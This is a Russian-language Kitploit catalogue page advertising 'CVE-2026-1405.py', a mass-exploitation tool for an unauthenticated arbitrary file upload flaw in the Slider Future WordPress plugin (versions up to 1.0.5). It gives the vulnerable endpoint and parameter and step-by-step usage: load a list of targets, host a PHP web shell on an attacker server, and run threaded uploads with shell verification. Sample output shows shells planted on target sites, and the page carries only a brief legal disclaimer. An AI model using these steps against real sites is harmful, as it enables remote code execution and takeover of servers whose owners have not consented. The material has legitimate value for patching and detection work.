Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-1405 — Slider Future <= 1.0.5 — Неавторизованная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2026-1405
Генерация полезной нагрузкиЭксплуатацияСкриптинг и автоматизацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHubnxploited/cve-2026-1405

CVE-2026-1405

Slider Future <= 1.0.5 — Неавторизованная произвольная загрузка файлов

Репозиторий
416 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-1405

Slider Future <= 1.0.5 – Неаутентифицированная произвольная загрузка файлов

🚀 CVE-2026-1405.py — Slider Future Mass Exploit Tool

🩸 Обзор уязвимости

Компонент: Slider Future (плагин WordPress)
Затронутые версии: ≤ 1.0.5
Уязвимость: Неаутентифицированная произвольная загрузка файлов
CVE: CVE-2026-1405
Оценка CVSS: 9.8 (Критический)

Плагин Slider Future для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файла в функции slider_future_handle_image_upload во всех версиях до 1.0.5 включительно. Это позволяет неаутентифицированным злоумышленникам загружать любые типы файлов, включая вредоносные PHP-шеллы, непосредственно на атакуемый сервер, что обеспечивает удалённое выполнение кода.


⚡ Возможности эксплойта

  • Массовая эксплуатация множества целей.
  • Использует уязвимую конечную точку: /wp-json/slider-future/v1/upload-image/
  • Загружает удалённый PHP-шелл через параметр image_url (без аутентификации).
  • Автоматически проверяет выполнение шелла, сверяя заданную сигнатуру.

🛠️ Инструкция по использованию

1. Подготовьте текстовый файл со списком целевых сайтов WordPress (по одному на строку):

root@kitploit:~
http://example1.com
https://example2.com
...

2. Разместите ваш PHP-шелл в интернете и подготовьте его прямой URL.

Пример: http://yourserver.com/shell.php

3. Запустите скрипт:

root@kitploit:~
python3 CVE-2026-1405.py

Вас попросят ввести:

  • Файл с целями: путь к вашему списку целей (по умолчанию list.txt)
  • Прямой URL шелла: общедоступный URL вашего шелла для загрузки на цели
  • Сигнатура шелла: уникальная строка в вашем шелле для проверки (например, Nxploited)
  • Потоки: количество параллельных потоков (по умолчанию 10)

4. Вывод

  • Результаты эксплуатации отображаются в реальном времени через профессиональный интерфейс Rich.
  • Успешные цели и URL шеллов автоматически сохраняются в success_results.txt.

📝 Детали скрипта

  • Название: CVE-2026-1405.py
  • Автор: Nxploited
  • Язык: Python 3
  • Библиотеки: requests, rich

Как это работает

  1. Отправляет POST-запрос к уязвимой конечной точке каждой цели:
    • URL: /wp-json/slider-future/v1/upload-image/
    • Параметр: image_url, указывающий на ваш шелл.
  2. Разбирает JSON-ответ для извлечения URL загруженного шелла.
  3. Переходит по URL шелла и ищет вашу сигнатуру.
  4. Отображает статус: успех или неудача для каждой цели.

⚠️ Правовое предупреждение

Этот инструмент предназначен только для образовательного и авторизованного тестирования безопасности.
Несанкционированное использование против сайтов, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным.


💡 Пример вывода

root@kitploit:~
Exploit For: CVE-2026-1405
By: Nxploited

Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited

2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt
Скачать инструмент